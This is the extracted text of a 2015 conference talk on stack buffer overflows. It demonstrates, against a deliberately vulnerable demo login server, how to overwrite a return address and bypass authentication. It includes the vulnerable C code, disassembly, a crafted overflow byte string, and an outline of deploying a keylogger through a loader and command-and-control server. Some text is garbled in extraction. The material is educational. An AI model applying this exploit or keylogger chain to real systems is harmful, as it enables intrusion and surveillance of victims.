offensive cyber security: smashing the stack with python

| Harris Proprietary Information Presentation Title | 0 harris.com

Offensive Cyber Security Smashing the Stack with Python

Malachi Jones, PhD Cyber Technologist

4/7/2015

| Harris Proprietary Information Presentation Title | 1

About Me

• Education

–Bachelors Degree: Computer Engineering (Univ. of Florida, 2007)

–Master’s Degree: Computer Engineering (Georgia Tech, 2010)

–PhD: Computer Engineering (Georgia Tech, 2013)

• Cyber Security Experience

– Intel: Cyber Software Engineering Intern (Summer 2011)

–Harris: Cyber Software Engineer (2014)

–Harris: Cyber Security Researcher (2015)


Outline

• Motivation: Why talk about the offensive side?

• Objectives of Talk

• Review

–The Stack

–Secure Coding

–Modern OS exploit mitigation techniques

• Smashing the Stack

• Exploiting the Smash

• Conclusion


Motivation: Why talk offensive cyber?

• Shouldn’t we be talking about how to write secure code?

– Key Concept: A necessary step in writing secure code is having

an understanding of how vulnerable code can be exploited

– Corollary: Seeing software through the eyes of a hacker can

provide valuable insights that can expose hidden exploits


Motivation: Why talk offensive cyber?

• Offensive cyber is driving the defense

– More resources/research goes into offensive cyber because

offense is cheaper and glamorous than defense

– Being on the offensive cyber frontier can help defenders

develop techniques before a new attack can cause significant

damage


Objectives of Talk

• Provide a step-by-step illustration of how not adhering to secure

software design principles can lead to exploitation

• Demonstrate how an attacker can develop powerful exploit code

very quickly using a scripting language like python


Review: The Stack


Review: The Stack

• Stack: Supports program execution by maintaining automatic process –

state data

• Example: Return address of the calling function (See following slides)

Caption: Process Memory Organization


Review: The Stack

• EIP : Register in the processor that stores the address of the next

instruction to be executed

• ESP : Register in the processor that stores pointer to the stack

(ESP=0xb20000)

v

int main() { char * message = “Hello World”; foo(); exit(0); }

EIP ……………….

……………

…………………..

……

0xb20000

Stack

0xb1fffc

ESP


Review: The Stack

• When main() calls foo(), the return address of the next instruction

to be executed after foo() is completed is pushed on to the stack

• Note: Stack pointer is decremented before the push()

v


EIP

……………….

Return addr Caller – main (4 bytes)

…………………..

……

0xb20000

Stack

0xb1fffc ESP


Review: The Stack

• Once foo() has completed, the stack is popped to retrieve the

address of next instruction to be executed

• During the pop(), the stack pointer is incremented

v


EIP

……………….

Return addr Caller – main (4 bytes)

…………………..

……

0xb20000

Stack

0xb1fffc

ESP


Review: Secure Coding



• Most production server code and OSs written in C/C++

• The genius/curse of C/C++

– Trust the programmer

– Don’t prevent the programming from doing what needs

to be done

– Make it fast, even if it is not guaranteed to be portable

• How does this translate to security and safety?

It doesn’t…..



• Best practices for secure C/C++ development

compiled by Robert C. Seacord

• Based on common mistakes that

inexperienced and professional software

developers make

• Should be a mandatory reading for any

aspiring C/C++ programmer



• Most recent and famous common mistakes

• Heartbleed was the result of the following poor practices:

– Improper bounds checking (Trusting user to provide the correct length

of the message)

– Not clearing dynamically allocated memory that would be accessed by

end user (calloc vs malloc)


Review: Secure Coding (Heartbleed Code)

v

/* Enter response type, length and copy payload */ *bp++ = TLS1_HB_RESPONSE; s2n(payload,bp); memcpy(bp, p1, payload);pl, payload);

Attacker Controlled the

data (p1) and the length

of payload (payload)

• Attacker can send 1kb of data, but specify payload to

be 64kb

• Key Point: Length of buffer should not be controlled

by the end user


Review: Modern OS Mitigation Techniques


Review: Modern OS Mitigation Techniques

• Address Space Layout Randomization (ASLR)

– Randomly offsets position in memory of key data structures

– The exploit(s) cannot rely on knowing where certain code is located in

memory

• Data Execution Prevention (DEP)

– Prevent executable code from running in the stack/heap segments

– Hardware support from CPUs with the No-Execute (NX) bit

• Bypassing ASLR and DEP w/ Return-oriented Programming

– Exploit code returns to sequences of instructions followed by a return

instruction

– Useful sequence of instructions is called a gadget


Smashing the Stack


Smashing the Stack (Vulnerable Sever)

• The Vulnerable Server

– Developed for demonstration purposes (No ASLR or stack canaries)

– Client connects to server and provides credentials

– If the client provides correct ‘admin’ credentials, the user is granted remote

access to the command line as an admin.

– Vulnerability: Code fails to properly bounds check buffer.

– Can enable a user to gain remote access without proper credentials!!


Smashing the Stack (Vulnerable Sever)

v

validpassword=validatePassword(usercredential_buff,password_len,username_len); if(validpassword) { printf("Determining if user is root\n"); char * username =strtok(usercredential_buff, DELIMETER); if (strcmp(username,"root")==0) { message = "Administrative access to system shell granted."; send(new_socket , message , strlen(message) , 0); while(1) { message = "Enter command to execute:"; send(new_socket , message , strlen(message) , 0); //Receiving command valread= recv( new_socket , command_buff, MAXRECV, 0); if(valread <=0) {break; } command_buff[valread] = NULL; //Executing command int retval = system(command_buff); } } }

Executes a

command provided

by remote user

Appears that this

region can be

accessed only

with appropriate

credentials


Smashing the Stack (Vulnerable Code)

• The Vulnerable Code

– Occurs in function validatepassword()

– Failure to bounds check a local buffer allocated on stack

– Enables the stack to be ‘smashed’ by overwriting the stack with data

supplied by the connecting client

– A clever user can overwrite the return address to the caller, i.e.

main(), to jump to desired execution point


Smashing the Stack (Vulnerable Code)

v

bool validatePassword(char * usercredential, int password_len, int username_len) { char username[100]; char password[100]; //Get username memcpy(username, usercredential,username_len); char *p_password = usercredential+ username_len +1; //Get password memcpy(password, p_password,password_len); if(strcmp(username,"root")==0) { if (strcmp(password,"route66")==0) { return true; } }else if (strcmp(username,"someuser")==0) { if (strcmp(password,"password")==0) { return true; } } return false; }

No check to make sure that the

password length does not exceed

the local buffer size of ‘100’

Password buffer has

length of 100


Smashing the Stack (The steps)

• Steps for smashing the stack

1. Determine size of stack in the callee function validatepassword()

2. Figure out where at on the stack the local buffer to store password

is located

3. Determine the desired target address for the function

validatepassword() to return to once it is completed

4. Craft the appropriate shellcode to inject into the password buffer



1) Determining the size of stack in the callee

function validatepassword()

(NEXT SLIDE)


Determining the size of Stack

v

; bool __cdecl validatePassword(char *usercredential, int password_len, int username_len) ?validatePassword@@YA_NPADHH@Z proc near password= byte ptr -114h username= byte ptr -0B0h p_password= dword ptr -4Ch var_48= dword ptr -48h var_44= dword ptr -44h var_40= dword ptr -40h ……...... var_2= byte ptr -2 var_1= byte ptr -1 usercredential= dword ptr 8 password_len= dword ptr 0Ch username_len= dword ptr 10h push ebp mov ebp, esp sub esp, 276 mov eax, [ebp+username_len] push eax ; Size

Assembly instruction that

allocates ‘276’ bytes on the

stack for the current function



2) Figure out where at on the stack the local

buffer to store password is located

(NEXT SLIDE)


v

Determining the size of Stack

; bool __cdecl validatePassword(char *usercredential, int password_len, int username_len) ?validatePassword@@YA_NPADHH@Z proc near password= byte ptr -276 username= byte ptr -176 p_password= dword ptr -4Ch var_48= dword ptr -48h var_44= dword ptr -44h var_40= dword ptr -40h ……...... var_2= byte ptr -2 var_1= byte ptr -1 usercredential= dword ptr 8 password_len= dword ptr 0Ch username_len= dword ptr 10h push ebp mov ebp, esp sub esp, 276 mov eax, [ebp+username_len] push eax ; Size

The password buffer is at the

bottom of stack at negative

offset 276 (0x114 276)

……………….

………

Password (100 bytes)

ebp -0

Stack

ebp -4

Username(100 bytes) ebp -176

ebp -276

...

...



3) Determine the desired target address for the function

validatepassword() to return to once it is completed

(Next Slide)


v

Determining target return address

int main(int argc , char *argv[]) { 10001200 push ebp .........................................{ printf("Determining if user is root\n"); 100014DC push 100022BCh 100014E1 call dword ptr ds:[10002030h] 100014E7 add esp,4 char * username =strtok(usercredential_buff, DELIMETER); 100014EA push 100022DCh 100014EF lea ecx,[usercredential_buff] 100014F5 push ecx 100014F6 call dword ptr ds:[1000203Ch] 100014FC add esp,8 100014FF mov dword ptr [ebp-7Ch],eax

v

int main(int argc , char *argv[]) { .........................................

validpassword=validatePassword(……); if(validpassword) { printf("Determining if user root\n"); char * username = strtok(…) if (strcmp(username,"root")==0) { message = "Administrative access to system shell granted..."; send(new_socket , message , strlen(message) , 0); } .................... } Jumping to address ‘0x100014EA’ allows us

to bypass the if statement that checks if

password is valid

Goal is to bypass

this check



4) Craft the appropriate shellcode to inject into

the password buffer

(Next Slide)


v

Crafting the appropriate shellcode

"\x89\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff“xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff“xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf

f\xff\x48\xff\x12\x00\xea\x14\x00\x10"

Shellcode

• Recall: We need 276 bytes to fill up stack allocated for validatepass()

• We also need to fill another 4 bytes because the callers ebp register is

preserved on stack

• The next 4 bytes after that is the return address we want to overwrite

…………….

……………….

Stack

....

...

saved ebp

return address

Little endian form of return

address ‘0x100014EA’

that we want to jump to

276 bytes


Crafting the appropriate shellcode

……

Password (100 bytes)

ebp -0h

Stack (before the smash)

Username(100 bytes) ebp -0b0h

ebp -114h

..

..

saved ebp

return address to main()

(0xffffffff)

(0xffffff89)

ebp -0h

Stack (after the smash)

(0xffffffff) ebp -0b0h

ebp -114h

..

..

ebp (0x0012ff48)

return address (0x100014ea)

• After the smash, the return address is now 0x100014ea

• Once validatepassword() returns to main(), execution will

begin at 0x100014ea, which allows us remote admin access



The end result of the stack smash

(Next Slide)


Smashing the Stack: The Result

We now have remote

admin access to the

command line

Execute a script remotely

to let host know it has

been p0wned


Exploiting the Smash w/ Python



• Now that we have gained root access, what's next?

• We’ll demonstrate how an attacker can use an easy to use scripting language

such as Python to exploit the smash

• Violent Python and Black Hat Python are two books that will be referenced to

demonstrate python exploits



• Specifically, we’ll do the following in this section:

– Develop a keylogger based on examples provided in the python books

– Setup a simple Command and Control server that will be listening for our

keylogger client to phone home


Exploiting the Smash w/ Python: Q&A

• It seems that to use python exploits, python would need to be already

installed on the victim?

– Not necessary……. There is this nifty tool called Pyinstaller

– Pyinstaller can generate a standalone executable that can run on

systems that don’t have python installed. Problem Solved!!

• Why are books like these publicly available?

– They are very useful for penetration testing, which can demonstrate to

an organization the impact that a vulnerability can have

– Increases awareness of techniques hackers use so that appropriate

defense mechanisms and techniques can be developed/implemented


Exploiting the Smash: The steps

• Steps for exploiting the smash w/ Python

1. Use the command line access to send a loader to the victim

(The loader is responsible for downloading the latest exploit payload

to the victim)

2. Remotely execute the loader to download keylogger to victim

3. Execute the payload remotely, which in this instance is a keylogger

4. Sit back and see what the victim is doing……


Exploiting the Smash (Step 1)

1) Use remote command line access to send

a loader script to the victim

(NEXT 2 SLIDES)


Sending the loader to victim

• Steps for exploiting the smash w/ Python

1. Use the command line access to send a loader to the victim

(The loader is responsible for downloading the latest exploit payload to the victim)

2. Set up the Command and Control Server so that the victim can phone home

3. Execute the payload remotely, which in this instance is a keylogger

4. Sit back and see what the victim is doing……

Echo loader script over

the command line to

victim server

Successfully uploaded

script to the victim


Sending the loader to victim

Echo loader script over

the command line to

victim server



2) Remotely execute the loader to download

keylogger to victim

(NEXT SLIDE)


Remotely execute loader

Remotely execute

loader script

Victim downloaded

keylogger



3) Execute the payload remotely, which in

this instance is a keylogger

(NEXT SLIDE)


Remotely execute payload (keylogger)

Remotely execute

loader script



4) Sit back, relax, and see what the victim is

up to now……

(NEXT 2 SLIDES)


See what the ‘client’ is up to…..

Client typing the following in Firefox:

1) www.google.com

2) I think I’ve been p0wned


Conclusion

• Main Takeaway: A necessary step in writing secure code is

having an understanding of how vulnerable code can be exploited

• Read “Secure coding in C/C++”

• Penetration testing is a valuable skill that (with the organizations

approval) can allow you to find vulns before the bad guys do


Questions?

offensive cyber security: smashing the stack with python

Engineering

stack stack

stack eip

stack pointer

stack esp

stack note

offensive cyber security

0xb20000 stack 0xb1fffcesp

offensive cyber frontier